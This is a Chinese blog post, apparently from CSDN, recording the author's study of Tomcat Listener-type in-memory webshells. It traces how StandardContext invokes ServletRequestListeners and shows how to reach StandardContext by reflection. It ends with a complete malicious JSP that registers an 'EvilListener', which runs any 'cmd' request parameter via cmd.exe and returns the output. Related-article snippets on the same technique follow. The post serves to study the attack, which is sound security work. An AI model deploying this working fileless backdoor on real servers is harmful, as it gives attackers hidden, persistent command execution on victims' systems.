java内存马学习记录(一)Tomcat Listener内存马

最新推荐文章于 2023-10-07 16:20:09 发布
最新推荐文章于 2023-10-07 16:20:09 发布
阅读量287 收藏 2
点赞数
文章标签: java 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AsagiRiAsagi/article/details/129642471
版权

java内存马学习记录(一)

Tomcat Listener内存马

原理

请求网站的时候, 程序先执行listener监听器的内容:Listener -> Filter -> Servlet

Listener是最先被加载的,Listener分以下几种

  • ServletContext,服务器启动和终止时触发
  • Session,有关Session操作时触发
  • Request,访问服务时触发

Request类型的Listener触发难度比较低,直接访问就可以,适合注册作为内存马

选择合适的Listener

在Tomcat中引入Listener需要实现两种接口,分别是LifecycleListener和原生EventListener

实现了LifecycleListener接口的监听器一般作用于tomcat初始化启动阶段,此时客户端的请求还没进入解析阶段,不适合用于内存马。EvenListener接口应用于各个对象事件的监听,有许多继承它的接口。

为了方便触发,这里关注继承EventListenerServletRequestListener接口,该接口监听ServletRequest对象的创建和销毁。

public interface ServletRequestListener extends EventListener {
	
    /**
     * The request is about to go out of scope of the web application.
     * @param sre Information about the request
     */
    void requestDestroyed (ServletRequestEvent sre);

    /**
     * The request is about to come into scope of the web application.
     * @param sre Information about the request
     */
    void requestInitialized (ServletRequestEvent sre);
}

requestInitialized方法在Request对象创建时被调用,requestDestroyed方法在Request对象销毁时调用。

实际访问任何资源时,都会触发requestInitialized方法,通过自定义实现了ServletRequestListener接口的Listener,可以在requestInitialized方法中加入恶意代码。那么如何添加一个自定义的Listener呢?

引入Listener

自定义一个测试用的Listener

package test;

import javax.servlet.*;


public class TestListener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("执行了TestListener requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("执行了TestListener requestInitialized");
    }
}

web.xml添加

    <listener>
        <listener-class>test.TestListener</listener-class>
    </listener>

requestInitialized处下断点,分析栈帧

requestInitialized:14, TestListener (test)
fireRequestInitEvent:5669, StandardContext (org.apache.catalina.core)
invoke:116, StandardHostValve (org.apache.catalina.core)
invoke:93, ErrorReportValve (org.apache.catalina.valves)
......
run:748, Thread (java.lang)

阅读StandardContext#fireRequestInitEvent部分

public boolean fireRequestInitEvent(ServletRequest request) {

    Object instances[] = getApplicationEventListeners();

    if ((instances != null) && (instances.length > 0)) {

        ServletRequestEvent event = new ServletRequestEvent(getServletContext(), request);

        for (Object instance : instances) {
            if (instance == null) {
                continue;
            }
            if (!(instance instanceof ServletRequestListener)) {
                continue;
            }
            ServletRequestListener listener = (ServletRequestListener) instance;

            try {
                listener.requestInitialized(event);
            } catch (Throwable t) {
                ExceptionUtils.handleThrowable(t);
                getLogger().error(
                        sm.getString("standardContext.requestListener.requestInit", instance.getClass().getName()),
                        t);
                request.setAttribute(RequestDispatcher.ERROR_EXCEPTION, t);
                return false;
            }
        }
    }
    return true;
}

大致逻辑是getApplicationEventListeners()返回了一个Listener实例数组,在for循环内遍历调用。跟进一下,看看是怎么获取实例数组的。

public Object[] getApplicationEventListeners() {
    return applicationEventListenersList.toArray();
}

applicationEventListenersListStandardContext的一个私有成员变量,搜索引用该变量的方法:

addApplicationEventListener(Object)
setApplicationEventListeners(Object[])
getApplicationEventListeners()

其中addApplicationEventListener是我们需要的方法,通过它可以向StandardContext注册自定义的Listener。

因此注册一个Listener内存马思路是这样的:

获取StandardContext,调用StandardContext#addApplicationEventListener注册恶意Listener。

获取StandardContext

(1) 通过request获取

这里的request是org.apache.catalina.connector.Request,实现了HttpServletRequest接口,因为jsp本质是servlet,可以直接调用

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
%>

(2)通过WebappClassLoaderBase获取

这里涉及Tomcat的类加载机制,笔者不太了解,只记录方法

WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();

StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
构造恶意Jsp注入内存马
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.io.IOException" %>

<%!
    class EvilListener implements ServletRequestListener {
        public void requestInitialized(ServletRequestEvent sre) {
            HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();
            //参考网上师傅的回显代码,通过I/O回显命令
            if (req.getParameter("cmd") != null){
                InputStream in = null;
                try {
                    in = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",req.getParameter("cmd")}).getInputStream();
                    Scanner s = new Scanner(in).useDelimiter("\\A");
                    String out = s.hasNext()?s.next():"";
                    Field requestF = req.getClass().getDeclaredField("request");
                    requestF.setAccessible(true);
                    Request request = (Request)requestF.get(req);
                    request.getResponse().getWriter().write(out);
                }
                catch (IOException e) {}
                catch (NoSuchFieldException e) {}
                catch (IllegalAccessException e) {}
            }
        }
        public void requestDestroyed(ServletRequestEvent sre) {}
    }
%>

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
    EvilListener evil = new EvilListener();
    context.addApplicationEventListener(evil);
%>
要接地气
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引入tomcat_Tomcat容器攻防笔记之Listener内存
weixin_35348182的博客
01-09 831
欢迎光临鲸落的杂货铺原文首发于安全客-安全资讯平台https://www.anquanke.com/post/id/226769(图自喜欢的古风插画家:微博@伊吹鸡腿子)背景: 基于现阶段红蓝对抗强度的提升,诸如WAF动态防御、态势感知、IDS恶意流量分析监测、文件多维特征监测、日志监测等手段,能够及时有效地检测、告警甚至阻断针对传统通过文件上传落地的Webshell或...
Java内存简单实现
派大星的博客
12-04 1883
Java内存
Tomcat内存
Christ1na的博客
03-03 569
Tomcat内存主要分为三种,分别是Filter型、Servlet型和Listener型,其原理是动态的将恶意组件添加到正在运行的Tomcat服务器中。
TomcatListener的使用范例(转载http://cywhoyi.iteye.com/blog/2075848)
10-22 139
Tomcat是非常有名的开源容器,因其开源我们可以对其做定制化的改变,而且Tomcat在其配置文件方面做了很多注释说明摘要,帮助我们更好的定制化我们所需的功能点。 New Tomcat Listener 首先看下Tomcat整个比较有名的Listener,在我们的conf/server.xml文件中一目了然 类图 NEXT 自定义的Listener,本代码是案例的方式,实际...
tomcat中的filter和listener
西红柿炒土豆
09-26 1390
1.Filter是过滤器,过滤一些不友好或是你不想要的东东, 2.Filter可以实现对请求的过滤和重定向等,也就是说可以操作request和response,session等对象 3.Filter 是struts的核心控制器,负责拦截所有用户请求。 4.Filter(过滤器):你可以写个类实现Filter接口,然后配置到web.xml中,那么Tomcat在接受到Http请求后首先会调用Fi
S07-tomcatListener内存1
08-03
ListenerTomcat中扮演着至关重要的角色,它们是Java Servlet规范的一部分,用于监听特定事件的发生并作出响应。Tomcat中的Listener主要分为两类:`org.apache.catalina.LifecycleListener`和`java.util.Event...
Tomcat容器攻防笔记之Listener内存 .pdf
09-05
Tomcat容器攻防笔记之Listener内存】 在网络安全领域,尤其是系统安全和漏洞分析方面,攻击者和防御者之间的较量日益激烈。随着技术的进步,包括AI和网络信息安全在内的多种安全措施已经部署,如WAF动态防御、...
暑假java问题和笔记(常用版).doc
11-30
Java基础】 1. `session`在创建数据库中指的是HTTP会话,它用于存储用户在网站上的一段时间内产生的信息,确保用户在不同页面间切换时数据的连续性。 2. 学习数据库时,熟悉SQL命令是必要的,如外键用于关联不同表...
TomcatJava Web开发技术详解
04-16
6. **Java EE组件**:介绍了Filter和Listener的概念,它们是Java Web开发中的重要组件,可以用来实现请求过滤、会话管理和日志记录等功能。 7. **安全性与性能优化**:讨论了Tomcat的安全配置,如SSL/TLS配置、角色...
tomcat7-research:tomcat原始码学习
03-23
Tomcat作为一个轻量级应用服务器,广泛应用于各种Web应用程序部署,其源码分析有助于开发者提升对Java Web技术的理解,优化性能,解决实际开发中的问题。 【标签】"系统开源" 【知识点详解】 1. **Java Servlet和...
Java 利用监听器来实现记录用户访问网站次数
dllnw04060的专栏
08-31 530
  假如有这么一个需求,要记录所有用户访问某一页面的次数。   最先想到的可能是在该Controller定义一个静态成员,然后在相应Action里自增。但这样有一个问题,就是Tomcat或者其他服务器重启的话,这个值是没办法保存的。   当然在数据库中直接保存也是可以的,但因此便要去单独建张表,日后用户访问相应页面都要去访问数据库维护该表有点不值得。   利用自定义ServletC...
Listener内存
最新发布
MachineGunJoe666
10-07 93
和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。
[Java安全]—Tomcat反序列化注入回显内存
Sentiment的博客
12-03 1017
在之前学的tomcat filter、listenerservlet内存中,其实并不算真正意义上的内存,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
深入底层源码的Listener内存(内存系列篇三)
m0_71746299的博客
01-27 314
写在前面 继前面的Filter``Servlet内存技术,这是系列文章的第三篇了,这篇将给大家带来的是Listener内存技术。 前置 什么是Listener? 监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。 监听器的相关概念: 事件:方法调用、属性改变、状态改变等。 事件源:被监听的对象( 例如:request、session、servletContext)。
[Java安全]—Tomcat Listener内存
Sentiment的博客
07-14 3224
内存,也被称为无文件,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存、注册表子项目中或者利用系统合法工具以逃避安全检测的方法。servlet-api类○ listener型○ filter型○ servlet型spring类○ 拦截器○ controller型Java Instrumentation类○ agent型顾名思义就是监听器,他能够监听一些事件从而来达
Java Tomcat内存——Listener内存
m0_61506558的博客
12-01 811
监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。事件:方法调用、属性改变、状态改变等。事件源:被监听的对象( 例如:request、session、servletContext)。监听器:用于监听事件源对象 ,事件源对象状态的变化都会触发监听器。注册监听器:将监听器与事件源进行绑定监听对象创建和销毁的监听器监听对象中属性变更的监听器。
论如何优雅的注入Java Agent内存
AS011x的博客
08-19 727
• 回顾• 优雅的构造JPLISAgent• Windows平台• Linux平台• 获取JVMTIEnv指针• 组装JPLISAgent• 动态修改类• Windows平台• Linux平台• 植入内存• 后记• 参考。
[Java安全]—Shiro回显内存注入
Sentiment的博客
02-20 2143
接上篇[Java安全]—Tomcat反序列化注入回显内存_,在上篇提到师傅们找到了一种Tomcat注入回显内存的方法, 但他其实有个不足之处:由于shiro中自定义了一个filter,因此无法在shiro中注入内存。所以在后边师傅们又找到了一个基于全局存储的新思路,可以在除tomcat 7以外的其他版本中使用。思路仍然为寻找 tomcat 中哪个类会存储 Request 和 Response在AbstractProcessor类中发现Request 和 Response,并且是final的,这就意味着

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值